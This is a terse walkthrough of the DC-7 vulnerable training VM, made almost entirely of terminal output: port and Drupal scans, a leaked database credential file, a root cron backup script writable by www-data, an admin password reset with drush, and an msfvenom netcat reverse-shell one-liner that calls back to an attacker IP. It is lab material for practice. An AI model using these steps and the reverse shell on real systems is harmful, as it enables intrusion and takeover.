DC 7
实战演练
最后更新于
最后更新于
┌──(root💀kali)-[~]
└─# nmap -p1-65535 192.168.32.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 01:44 EDT
Nmap scan report for 192.168.32.166
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:85:DD:9B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds┌──(root💀kali)-[/opt/droopescan-master]
└─# docker run droopescan scan drupal -u http://192.168.32.166
[+] No plugins found.
[+] Themes found:
startupgrowth_lite http://192.168.32.166/themes/startupgrowth_lite/
http://192.168.32.166/themes/startupgrowth_lite/LICENSE.txt
[+] Possible version(s):
8.7.0
8.7.0-alpha1
8.7.0-alpha2
8.7.0-beta1
8.7.0-beta2
8.7.0-rc1
8.7.1
8.7.10
8.7.11
8.7.12
8.7.13
8.7.14
8.7.2
8.7.3
8.7.4
8.7.5
8.7.6
8.7.7
8.7.8
8.7.9
[+] Possible interesting urls found:
Default admin - http://192.168.32.166/user/login
[+] Scan finished (0:02:01.475158 elapsed)<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>dc7user@dc-7:~$ cat mbox
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
dc7user@dc-7:~$ ls -al /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.shdc7user@dc-7:/var/www/html$ ls
autoload.php composer.json composer.lock core example.gitignore index.php INSTALL.txt LICENSE.txt modules profiles README.txt robots.txt sites themes update.php vendor web.config
dc7user@dc-7:/var/www/html$ drush user-password admin --password=test
Changed password for admin ┌──(root💀kali)-[/opt/droopescan-master]
└─# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.32.130 lport=9999 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/yvixve; nc 192.168.32.130 9999 0</tmp/yvixve | /bin/sh >/tmp/yvixve 2>&1; rm /tmp/yvixve